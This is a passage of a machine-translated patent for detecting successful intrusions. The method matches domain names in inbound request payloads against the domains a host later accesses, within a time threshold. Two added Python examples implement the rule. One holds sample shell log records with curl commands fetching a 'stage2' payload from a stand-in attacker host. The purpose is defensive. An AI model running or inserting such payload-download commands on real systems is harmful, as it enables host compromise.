In yet another example, consider that for an attack packet, there is a time difference between the time the host receives the attack packet and the time the host accesses the domain name in the attack packet, which is typically within a certain range. In view of this, in one example, after determining that the at least one domain name includes the first domain name and the time corresponding to the first domain name included in the host log is later than the time when the host receives the first request packet, the detection device further determines whether a difference between the time corresponding to the first domain name included in the host log and the time when the host receives the first request packet is less than or equal to a preset time threshold. And when the difference between the moment corresponding to the first domain name and the moment when the host receives the first request message is smaller than or equal to a preset time threshold, determining that the host is attacked, and specifically determining that an attacker uses the first request message to attack the host. For this case, the detection device generates the aforementioned alert information indicating that the host is attacked.
The embodiment of the present application does not particularly limit the preset time threshold. In one example, the preset time threshold is a relatively small value, for example 10 seconds, considering that the time difference between the time when the host receives the attack packet and the time when the host accesses the domain name in the attack packet is generally relatively small. In addition, setting the preset time threshold to a smaller value improves the efficiency of detecting the attack message, so that the attack message can be detected in time and handling measures can be taken in time. For example: if the preset time threshold is set longer, say 5 hours, then after the host receives the first request message, the first domain name needs to be compared with the domain names accessed by the host within 5 hours; in other words, in some cases it is necessary to wait 5 hours to determine whether the host is attacked.
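Steps S101 to S103, including the time-ordering and threshold checks described above, as an added example that is not code from the patent: the regular expression, the log entries, the IP addresses, the domain names and the 10-second threshold default are constructed assumptions, and the example generalizes the text slightly by matching every domain name found in the payload rather than only the first.

```python
import re
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Optional

# Constructed, simplified RFC 1035 label pattern: 1-63 chars, alphanumerics and
# hyphens, no leading or trailing hyphen. The last label must be alphabetic so
# that dotted numbers (IP addresses, "HTTP/1.1") are not taken as domain names.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_DOMAIN_RE = re.compile(
    rf"(?<![A-Za-z0-9.-])(?:{_LABEL}\.)+[A-Za-z]{{2,63}}(?![A-Za-z0-9.-])"
)


@dataclass(frozen=True)
class WebLogEntry:
    """Parameter information of one request message received by the host (S101)."""
    received_at: datetime
    dest_ip: str
    payload: bytes

    def domains(self) -> list[str]:
        """Domain names found in the payload, lowercased, first occurrence first."""
        text = self.payload.decode("utf-8", errors="replace")
        found: list[str] = []
        for m in _DOMAIN_RE.finditer(text):
            d = m.group(0).lower()
            if d not in found:
                found.append(d)
        return found


@dataclass(frozen=True)
class HostLogEntry:
    """One domain name accessed by the host, with the access time and the
    shell execution record the domain was extracted from (S102)."""
    domain: str
    accessed_at: datetime
    record: str


@dataclass(frozen=True)
class Alert:
    """Alarm information: host IP, matched domain, request details, host record."""
    host_ip: str
    domain: str
    dest_ip: str
    payload: bytes
    host_record: str
    delay_seconds: float


def detect(web: WebLogEntry, host_log: list[HostLogEntry], host_ip: str,
           threshold_seconds: float = 10.0) -> Optional[Alert]:
    """S103 with both refinements: a domain from the request payload must appear
    in the host log, the host access must be later than the request, and the gap
    must not exceed the preset threshold. Returns None when no such access
    exists, i.e. the request did not lead to a successful attack and no alarm
    is raised. The earliest qualifying access wins."""
    candidates = set(web.domains())
    if not candidates:
        return None
    for entry in sorted(host_log, key=lambda e: e.accessed_at):
        if entry.domain.lower() not in candidates:
            continue
        delay = (entry.accessed_at - web.received_at).total_seconds()
        if delay <= 0 or delay > threshold_seconds:
            continue  # accessed before the request, or too long after it
        return Alert(host_ip, entry.domain.lower(), web.dest_ip, web.payload,
                     entry.record, delay)
    return None


# Constructed sample data: one request carrying a domain in its payload, and a
# host shell log containing an unrelated earlier access, an earlier access to
# the same domain (not caused by this request), and one access 4 s later.
T0 = datetime(2024, 1, 1, 12, 0, 0)
SAMPLE_WEB = WebLogEntry(
    received_at=T0,
    dest_ip="192.0.2.10",
    payload=(b"POST /api/run HTTP/1.1\r\nHost: 192.0.2.10\r\n\r\n"
             b'{"fetch": "http://dl.payload-host.example/stage2"}'),
)
SAMPLE_HOST_LOG = [
    HostLogEntry("cdn.vendor-updates.example", T0 - timedelta(minutes=3),
                 "sh -c 'curl -sO https://cdn.vendor-updates.example/patch.tgz'"),
    HostLogEntry("dl.payload-host.example", T0 - timedelta(seconds=20),
                 "sh -c 'curl -I http://dl.payload-host.example/'"),
    HostLogEntry("dl.payload-host.example", T0 + timedelta(seconds=4),
                 "sh -c 'curl -o /tmp/s2 http://dl.payload-host.example/stage2'"),
]
# Same host log without the access that followed the request: unsuccessful attack.
SAMPLE_HOST_LOG_UNSUCCESSFUL = [e for e in SAMPLE_HOST_LOG if e.accessed_at <= T0]

if __name__ == "__main__":
    print(detect(SAMPLE_WEB, SAMPLE_HOST_LOG, "10.0.0.5"))               # Alert(...)
    print(detect(SAMPLE_WEB, SAMPLE_HOST_LOG_UNSUCCESSFUL, "10.0.0.5"))  # None
```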
As can be seen from the above description, with the method for detecting an attack provided by the embodiment of the present application, whether the host is attacked is determined by combining the first domain name included in the first request message with the at least one domain name accessed by the host. In the attack scenario where an attacker exploits a vulnerability to intrude into the host, and the vulnerability allows the attacker to directly execute system commands on the host, the detection mechanism of this scheme mirrors the attacker's attack pattern, so the scheme can accurately detect the attack on the host.
Moreover, with the scheme of the embodiment of the application, the attack message is identified by combining the weblog and the host log, that is, the attack message identified by the scheme is one whose attack succeeded. Therefore, with this scheme no alarm is triggered for an attack message whose attack did not succeed, and false alarms are reduced.
Referring to fig. 4, fig. 4 is a signaling interaction diagram of an attack detection method according to an embodiment of the present application. The method for detecting the attack shown in fig. 4 is applied to a system for detecting the attack, and the system for detecting the attack comprises a host, a security device and a detection device. In one example, the system for detecting attacks is deployed in the network scenario corresponding to fig. 2b, namely: the system for detecting attacks comprises: host 102, security device 103, and integrated analysis device 104. In yet another example, the system for detecting attacks is deployed in the network scenario corresponding to fig. 2c, namely: the system for detecting attacks comprises: host 102, security device 103, and cloud analytics device 105.
The method of detecting an attack shown in fig. 4 includes steps S201-S204.
S201: the security device sends a weblog of the host to the detection device, wherein the weblog comprises parameter information of a first request message, the first request message is a message received by the host from other devices, and the parameter information comprises a first domain name included in a load part of the first request message.
S202: and the host sends a host log of the host to the detection device, wherein the host log comprises at least one domain name accessed by the host.
S203: and the detection equipment receives the weblog sent by the security equipment and receives the host log sent by the host.
S204: and the detection equipment generates alarm information when the at least one domain name comprises the first domain name, wherein the alarm information is used for indicating that the host is attacked.
With respect to the specific implementation of S201 to S204, reference may be made to the relevant description section in S101 to S103 above, and the description is not repeated here.
Based on the method for detecting the attack provided by the embodiment, the embodiment of the application also provides a corresponding device.
Referring to fig. 5, the structure of a detection device according to an embodiment of the present application is shown. The detection device is used for executing the attack detection method provided by the method embodiment.
The detection device 500 shown in fig. 5 includes an acquisition module 501 and a processing module 502.
In one example, the detection apparatus 500 shown in fig. 5 is applied to a detection device, for which case:
the obtaining module 501 is configured to obtain a weblog of a host, where the weblog includes parameter information of a first request packet, where the first request packet is a request packet received by the host from another device, and the parameter information includes a first domain name included in a payload portion of the first request packet; the obtaining module 501 is further configured to obtain a host log of the host, where the host log includes at least one domain name accessed by the host; the processing module 502 is configured to generate alarm information if the at least one domain name includes the first domain name, where the alarm is used to indicate that the host is attacked.
In a possible implementation manner, the parameter information further includes a time when the host receives the first request packet, and the host log further includes a time corresponding to each domain name in the at least one domain name, where the time corresponding to a second domain name is the time when the host accesses the second domain name, and the at least one domain name includes the second domain name.
In a possible implementation manner, if the at least one domain name includes the first domain name, the processing module 502 is configured to: generate the alarm information if the at least one domain name comprises the first domain name and the time corresponding to the first domain name in the host log is later than the time when the host receives the first request packet.
In a possible implementation manner, if the at least one domain name includes the first domain name and the time corresponding to the first domain name included in the host log is later than the time when the host receives the first request packet, the processing module 502 is configured to: generate the alarm information if the at least one domain name comprises the first domain name, the time corresponding to the first domain name included in the host log is later than the time when the host receives the first request packet, and the difference between the time corresponding to the first domain name included in the host log and the time when the host receives the first request packet is less than or equal to a preset time threshold.
In one possible implementation manner, the detection device is integrated in the host, and the obtaining module 501 is configured to: obtain the weblog of the host by hooking a network function; and obtain the host log of the host by hooking the shell execution process in the operating system.
In a possible implementation manner, the detecting device is another independent computer device connected to the host through a network, and the acquiring module 501 is configured to: receiving the weblog sent by a security device, wherein the security device is deployed between the other devices and the host; and receiving the host log sent by the host.
In one possible implementation, the detection device, the security device, and the host are located within the same local area network.
In one possible implementation, the detection device is deployed in the internet.
In one possible implementation, the processing module 502 is further configured to: and outputting the alarm information.
In a possible implementation manner, the parameter information further includes the payload portion and/or a destination IP address of the first request packet, and the alarm information further includes the payload portion and/or the destination IP address of the first request packet included in the parameter information.
In a possible implementation manner, the host log further includes an IP address of the host and/or a log record corresponding to each domain name in the at least one domain name, and the alarm information further includes an IP address of the host and/or a log record corresponding to the first domain name included in the host log.
In yet another example, the detection apparatus 500 shown in fig. 5 is integrated in a host, for which case:
the obtaining module 501 is configured to obtain a weblog of the host, where the weblog includes parameter information of a first request packet, where the first request packet is a request packet received by the host from another device, and the parameter information includes a first domain name included in a payload portion of the first request packet; the obtaining module 501 is further configured to obtain a host log of the host, where the host log includes at least one domain name accessed by the host; a processing module 502, configured to generate alarm information if the at least one domain name includes the first domain name, where the alarm information is used to indicate that the host is attacked.
In one possible implementation, the obtaining module 501 is configured to obtain the weblog of the host by hooking a network function, and to obtain the host log of the host by hooking shell execution in the operating system.
Since the detection apparatus 500 is an apparatus corresponding to the method for detecting an attack provided in the above method embodiment, the specific implementation of each unit of the apparatus 500 is the same as the above method embodiment, and therefore, with respect to the specific implementation of each unit of the apparatus 500, reference may be made to the description of the above method embodiment, which is not repeated herein.
It should be noted that, the hardware structure of the aforementioned detection apparatus 500 may be the structure shown in fig. 6, and fig. 6 is a schematic structural diagram of an apparatus according to an embodiment of the present application.
Referring to fig. 6, an apparatus 600 includes: a processor 610, a communication interface 620, and a memory 630. Where the number of processors 610 in device 600 may be one or more, one processor is illustrated in fig. 6. In an embodiment of the present application, processor 610, communication interface 620, and memory 630 may be connected by a bus system or otherwise, as shown in FIG. 6 by way of example as bus system 640.
The processor 610 may be a central processing unit (central processing unit, CPU), a network processor (network processor, NP) or a combination of CPU and NP. The processor 610 may further include a hardware chip. The hardware chip may be an application-specific integrated circuit (ASIC), a programmable logic device (programmable logic device, PLD), or a combination thereof. The PLD may be a complex programmable logic device (complex programmable logic device, CPLD), a field-programmable gate array (field-programmable gate array, FPGA), general-purpose array logic (generic array logic, GAL), or any combination thereof.
The memory 630 may include a volatile memory, such as a random-access memory (random-access memory, RAM); the memory 630 may also include a non-volatile memory (non-volatile memory), such as a flash memory (flash memory), a hard disk drive (hard disk drive, HDD) or a solid-state drive (solid-state drive, SSD); the memory 630 may also include a combination of the above types of memory. The memory 630 can store, for example, the weblog of the host and the host log of the host.
Memory 630 optionally stores an operating system and programs, executable modules or data structures, or a subset thereof, or an extended set thereof, wherein the programs may include various operational instructions for performing various operations. The operating system may include various system programs for implementing various underlying services and handling hardware-based tasks. The processor 610 may read the program in the memory 630 to implement the method for detecting an attack according to the embodiment of the present application.
The bus system 640 may be a peripheral component interconnect (peripheral component interconnect, PCI) bus or an extended industry standard architecture (extended industry standard architecture, EISA) bus, among others. The bus system 640 may be divided into an address bus, a data bus, a control bus, and the like. For ease of illustration, only one thick line is shown in fig. 6, but this does not mean that there is only one bus or only one type of bus.
The embodiments of the present application also provide a computer-readable storage medium comprising instructions or a computer program which, when run on a computer, causes the computer to perform the method of detecting an attack provided by the above embodiments.
The embodiments of the present application also provide a computer program product comprising instructions or a computer program which, when run on a computer, causes the computer to perform the method of detecting an attack provided by the above embodiments.
The terms "first," "second," "third," "fourth" and the like in the description and in the claims and in the above drawings, if any, are used for distinguishing between similar objects and not necessarily for describing a particular sequential or chronological order. It is to be understood that the data so used may be interchanged where appropriate such that the embodiments described herein may be implemented in other sequences than those illustrated or otherwise described herein. Furthermore, the terms "comprises," "comprising," and "having," and any variations thereof, are intended to cover a non-exclusive inclusion, such that a process, method, system, article, or apparatus that comprises a list of steps or elements is not necessarily limited to those steps or elements expressly listed but may include other steps or elements not expressly listed or inherent to such process, method, article, or apparatus.
It will be clear to those skilled in the art that, for convenience and brevity of description, specific working procedures of the above-described systems, apparatuses and units may refer to corresponding procedures in the foregoing method embodiments, which are not repeated herein.
In the several embodiments provided in the present application, it should be understood that the disclosed systems, devices, and methods may be implemented in other manners. For example, the above-described apparatus embodiments are merely illustrative, e.g., the division of units is merely a logical service division, and there may be additional divisions in actual implementation, e.g., multiple units or components may be combined or integrated into another system, or some features may be omitted, or not performed. Alternatively, the coupling or direct coupling or communication connection shown or discussed with each other may be an indirect coupling or communication connection via some interfaces, devices or units, which may be in electrical, mechanical or other form.
The units described as separate units may or may not be physically separate, and units shown as units may or may not be physical units, may be located in one place, or may be distributed over a plurality of network units. Some or all of the units may be selected according to actual needs to achieve the purpose of the solution of this embodiment.
In addition, each service unit in the embodiments of the present application may be integrated in one processing unit, or each unit may exist alone physically, or two or more units may be integrated in one unit. The integrated units may be implemented in hardware or in software business units.
The integrated units, if implemented in the form of software business units and sold or used as stand-alone products, may be stored in a computer readable storage medium. Based on such understanding, the technical solution of the present application, in essence or in the part contributing to the prior art, or all or part of the technical solution, may be embodied in the form of a software product stored in a storage medium, including several instructions for causing a computer device (which may be a personal computer, a server, or a network device, etc.) to perform all or part of the steps of the methods of the embodiments of the present application. The aforementioned storage medium includes: a USB flash drive, a removable hard disk, a read-only memory (Read-Only Memory, ROM), a random access memory (Random Access Memory, RAM), a magnetic disk, an optical disk, or other media capable of storing program code.
Those skilled in the art will appreciate that in one or more of the examples described above, the services described herein may be implemented in hardware, software, firmware, or any combination thereof. When implemented in software, the services may be stored in a computer-readable medium or transmitted as one or more instructions or code on a computer-readable medium. Computer-readable media includes both computer storage media and communication media including any medium that facilitates transfer of a computer program from one place to another. A storage media may be any available media that can be accessed by a general purpose or special purpose computer.
The objects, technical solutions and advantageous effects of the present application have been described in further detail in the above embodiments, and it should be understood that the above are only embodiments of the present application.
The above embodiments are only for illustrating the technical solution of the present application, and not for limiting the same; although the application has been described in detail with reference to the foregoing embodiments, it will be understood by those of ordinary skill in the art that the technical solution described in the foregoing embodiments can be modified, or some of its technical features can be replaced by equivalents, and that such modifications and substitutions do not depart from the spirit of the application.

Claims (28)

1. A method of detecting an attack, applied to a detection device, the method comprising:
acquiring a weblog of a host, wherein the weblog comprises parameter information of a first request message, the first request message is a request message received by the host from other equipment, and the parameter information comprises a first domain name included in a load part of the first request message;
obtaining a host log of the host, wherein the host log comprises at least one domain name accessed by the host;
and if the at least one domain name comprises the first domain name, generating alarm information, wherein the alarm information is used for indicating that the host is attacked.
2. The method of claim 1, wherein the parameter information further includes a time when the host receives the first request message, the host log further includes a time corresponding to each domain name in the at least one domain name, the time corresponding to a second domain name in the host log is the time when the host accesses the second domain name, and the at least one domain name includes the second domain name.
3. The method of claim 2, wherein generating the alert message if the at least one domain name includes the first domain name comprises:
and if the at least one domain name comprises the first domain name and the time corresponding to the first domain name included in the host log is later than the time when the host receives the first request message, generating the alarm information.
4. The method according to claim 3, wherein generating the alert information if the at least one domain name includes the first domain name and the time corresponding to the first domain name included in the host log is later than the time when the first request message is received by the host includes:
and if the at least one domain name comprises the first domain name, the time corresponding to the first domain name included in the host log is later than the time when the host receives the first request message, and the difference between the time corresponding to the first domain name included in the host log and the time when the host receives the first request message is less than or equal to a preset time threshold, generating the alarm information.
5. The method of any of claims 1-4, wherein the detection device is integrated in the host, and wherein the obtaining a weblog of the host comprises:
obtaining the weblog of the host by hooking a network function;
and the obtaining the host log of the host comprises:
obtaining the host log of the host by hooking the shell execution process of the operating system.
6. The method of any of claims 1-4, wherein the detection device is another independent computer device in network connection with the host, and wherein the obtaining a weblog of the host comprises:
receiving the weblog sent by a security device, wherein the security device is deployed between the other devices and the host;
the obtaining the host log of the host includes:
and receiving the host log sent by the host.
7. The method of claim 6, wherein the detection device, the security device, and the host are located within the same local area network.
8. The method of claim 6, wherein the detection device is deployed in the internet.
9. The method according to claim 1, wherein the parameter information further comprises a destination IP address of the first request message and/or the payload portion, and the alarm information further comprises a destination IP address of the first request message and/or the payload portion included in the parameter information.
10. The method according to claim 1 or 9, wherein the host log further comprises an IP address of the host and/or a log record corresponding to each domain name of the at least one domain name, and the alarm information further comprises an IP address of the host and/or a log record corresponding to the first domain name included in the host log.
11. A system for detecting an attack, the system comprising a security device, a host and a detection device;
the security device is configured to send a weblog of the host to the detection device, where the weblog includes parameter information of a first request packet, the first request packet is a packet received by the host from another device, and the parameter information includes a first domain name included in a payload portion of the first request packet;
the host is configured to send a host log of the host to the detection device, where the host log includes at least one domain name accessed by the host;
the detection device is configured to receive the weblog sent by the security device, receive the host log sent by the host, and generate alarm information when the at least one domain name includes the first domain name, where the alarm information is used to indicate that the host is attacked.
12. The system of claim 11, wherein the parameter information further includes a time when the host receives the first request message, the host log further includes a time corresponding to each domain name in the at least one domain name, the time corresponding to a second domain name in the host log is the time when the host accesses the second domain name, and the at least one domain name includes the second domain name.
13. The system of claim 12, wherein the detection device is configured to:
generate the alarm information under the condition that the at least one domain name comprises the first domain name and the time corresponding to the first domain name included in the host log is later than the time when the host receives the first request message.
14. The system of claim 13, wherein the detection device is configured to:
generate the alarm information under the condition that the at least one domain name comprises the first domain name, the time corresponding to the first domain name included in the host log is later than the time when the host receives the first request message, and the difference between the time corresponding to the first domain name included in the host log and the time when the host receives the first request message is less than or equal to a preset time threshold.
15. The system of any of claims 11-14, wherein the host obtains the host log of the host by hooking the shell execution process of the operating system.
16. The system of any of claims 11-15, wherein the detection device, the security device, and the host are located within the same local area network.
17. The system of any one of claims 11-15, wherein the detection device is deployed in the internet.
18. A detection device integrated in a host, the detection device comprising:
an acquisition module, configured to acquire a weblog of the host, wherein the weblog comprises parameter information of a first request message, the first request message is a request message received by the host from other equipment, and the parameter information comprises a first domain name included in a load part of the first request message;
the acquisition module is further configured to acquire a host log of the host, where the host log includes at least one domain name accessed by the host;
and a processing module, configured to generate alarm information if the at least one domain name comprises the first domain name, wherein the alarm information is used for indicating that the host is attacked.
19. The apparatus of claim 18, wherein the obtaining module is configured to obtain the weblog of the host by hooking a network function, and to obtain the host log of the host by hooking the shell execution process of the operating system.
20. A detection apparatus for use in a detection device, the apparatus comprising:
an acquisition module, configured to acquire a weblog of a host, wherein the weblog comprises parameter information of a first request message, the first request message is a request message received by the host from other equipment, and the parameter information comprises a first domain name included in a load part of the first request message;
the acquisition module is further configured to acquire a host log of the host, where the host log includes at least one domain name accessed by the host;
and a processing module, configured to generate alarm information if the at least one domain name comprises the first domain name, wherein the alarm information is used for indicating that the host is attacked.
21. The apparatus of claim 20, wherein the parameter information further comprises a time when the first request message is received by the host, the host log further comprises a time corresponding to each domain name in the at least one domain name, the time corresponding to a second domain name in the host log is the time when the second domain name is accessed by the host, and the at least one domain name comprises the second domain name.
22. The apparatus of claim 21, wherein the processing module is configured to:
generate the alarm information if the at least one domain name comprises the first domain name and the time corresponding to the first domain name included in the host log is later than the time when the host receives the first request message.
23. The apparatus of claim 22, wherein the processing module is configured to:
generate the alarm information if the at least one domain name comprises the first domain name, the time corresponding to the first domain name included in the host log is later than the time when the host receives the first request message, and the difference between the time corresponding to the first domain name included in the host log and the time when the host receives the first request message is less than or equal to a preset time threshold.
24. The apparatus according to any of claims 20-23, wherein the detection device is another independent computer device in network connection with the host, the acquisition module being configured to:
receiving the weblog sent by a security device, wherein the security device is deployed between the other devices and the host;
and receiving the host log sent by the host.
25. The apparatus of claim 24, wherein the detection device, the security device, and the host are located within the same local area network.
26. The apparatus of claim 24, wherein the detection device is deployed in the internet.
27. An apparatus, comprising: a processor and a memory;
the memory is used for storing instructions or computer programs;
the processor being adapted to execute the instructions or the computer program to perform the method of any of claims 1-10.
28. A computer readable storage medium comprising instructions or a computer program which, when run on a computer, causes the computer to perform the method of any of the preceding claims 1-10.
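The correlation rule of claims 1 to 4, together with the alarm contents of claims 9 and 10, as an added Python example (this is not the patent's or the applicant's code): it parses a constructed weblog of inbound requests and a constructed host log of domain accesses, extracts domain names from request payloads, and raises an alarm only when the host accessed such a domain strictly after the request arrived and within a preset time threshold; the alarm carries the request's destination IP and payload and the matching host log record. The log line formats, field names, IP addresses, domain names and the domain-matching regex are all constructed assumptions, and the example goes slightly beyond claim 1 by checking every domain name found in a payload rather than only the first one.

```python
"""Added example: correlate inbound request payloads (weblog) with the
domains a host later accesses (host log). Formats and samples are constructed."""
import re
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from typing import Dict, List, Optional

# Heuristic for a domain name inside a payload: dotted labels with an alphabetic
# TLD. Constructed for this example; a real collector would URL-decode and parse
# the payload first, and the pattern would also match file names such as "a.pdf".
DOMAIN_RE = re.compile(r"(?i)\b((?:[a-z0-9-]+\.)+[a-z]{2,})\b")

# Constructed line formats (assumptions, not the patent's):
#   weblog : "<iso-time> dst=<ip> payload=\"<request line>\""
#   hostlog: "<iso-time> host=<ip> dns <domain>"
WEBLOG_RE = re.compile(r'^(\S+) dst=(\S+) payload="(.*)"$')
HOSTLOG_RE = re.compile(r'^(\S+) host=(\S+) dns (\S+)$')


@dataclass
class RequestRecord:
    """Parameter information of one inbound request (claims 1, 2 and 9)."""
    received_at: datetime
    dst_ip: str
    payload: str
    domains: List[str]


@dataclass
class HostAccess:
    """One host log entry: a domain the host accessed and when (claims 2 and 10)."""
    accessed_at: datetime
    host_ip: str
    domain: str
    record: str


def _ts(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def parse_weblog(lines: List[str]) -> List[RequestRecord]:
    out = []
    for line in lines:
        m = WEBLOG_RE.match(line.strip())
        if not m:
            continue  # malformed line: skip rather than crash the detector
        ts, dst, payload = m.groups()
        domains = [d.lower() for d in DOMAIN_RE.findall(payload)]
        out.append(RequestRecord(_ts(ts), dst, payload, domains))
    return out


def parse_hostlog(lines: List[str]) -> List[HostAccess]:
    out = []
    for line in lines:
        m = HOSTLOG_RE.match(line.strip())
        if not m:
            continue
        ts, host_ip, domain = m.groups()
        out.append(HostAccess(_ts(ts), host_ip, domain.lower(), line.strip()))
    return out


def detect(weblog: List[RequestRecord], hostlog: List[HostAccess],
           threshold: Optional[timedelta] = timedelta(minutes=10)) -> List[dict]:
    """Claim 4 rule: alarm when a payload domain is accessed by the host strictly
    after the request was received and within `threshold`. With threshold=None
    only the ordering check of claim 3 applies."""
    by_domain: Dict[str, List[HostAccess]] = {}
    for acc in hostlog:
        by_domain.setdefault(acc.domain, []).append(acc)
    alarms = []
    for req in weblog:
        for dom in req.domains:
            for acc in sorted(by_domain.get(dom, []), key=lambda a: a.accessed_at):
                delta = acc.accessed_at - req.received_at
                if delta > timedelta(0) and (threshold is None or delta <= threshold):
                    alarms.append({
                        "host_ip": acc.host_ip,            # claim 10
                        "dst_ip": req.dst_ip,              # claim 9
                        "domain": dom,
                        "request_payload": req.payload,    # claim 9
                        "host_log_record": acc.record,     # claim 10
                        "seconds_between": delta.total_seconds(),
                    })
                    break  # one alarm per (request, domain): the earliest match
    return alarms


# Constructed sample logs for a single host 10.0.0.5.
SAMPLE_WEBLOG = [
    '2024-05-07T10:00:01Z dst=10.0.0.5 payload="GET /api/fetch?url=http://lookup.example.test/x"',
    '2024-05-07T10:05:00Z dst=10.0.0.5 payload="GET /api/fetch?url=http://updates.example.test/y"',
    '2024-05-07T10:10:00Z dst=10.0.0.5 payload="GET /api/fetch?url=http://slow.example.test/z"',
    '2024-05-07T10:12:00Z dst=10.0.0.5 payload="GET /health"',
]
SAMPLE_HOSTLOG = [
    '2024-05-07T09:59:00Z host=10.0.0.5 dns updates.example.test',  # before its request: no alarm
    '2024-05-07T10:00:03Z host=10.0.0.5 dns lookup.example.test',   # 2 s after the request: alarm
    '2024-05-07T10:30:00Z host=10.0.0.5 dns slow.example.test',     # 20 min later: outside threshold
]


def run_sample(threshold: Optional[timedelta] = timedelta(minutes=10)) -> List[dict]:
    return detect(parse_weblog(SAMPLE_WEBLOG), parse_hostlog(SAMPLE_HOSTLOG), threshold)


if __name__ == "__main__":
    for alarm in run_sample():
        print(alarm)
```

With the default ten-minute threshold only the `lookup.example.test` request produces an alarm: the `updates.example.test` access predates its request (the ordering check of claim 3 rejects it), and the `slow.example.test` access falls outside the threshold of claim 4. Dropping the threshold (`run_sample(threshold=None)`) turns the slow case into a second alarm, which is the trade-off the preset threshold is there to control.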

Priority Applications (2)

Application Number Priority Date Filing Date Title
CN202210493521.XA CN117061139A (en) 2022-05-07 2022-05-07 Attack detection method and device
PCT/CN2023/087493 WO2023216792A1 (en) 2022-05-07 2023-04-11 Attack detection method, and apparatus

Publications (1)

Publication Number Publication Date
CN117061139A true CN117061139A (en) 2023-11-14

Family

ID=88663253

Country Status (2)

Country Link
CN (1) CN117061139A (en)
WO (1) WO2023216792A1 (en)

Also Published As

Publication number Publication date
WO2023216792A1 (en) 2023-11-16

Legal Events

Date Code Title Description
PB01 Publication
SE01 Entry into force of request for substantive examination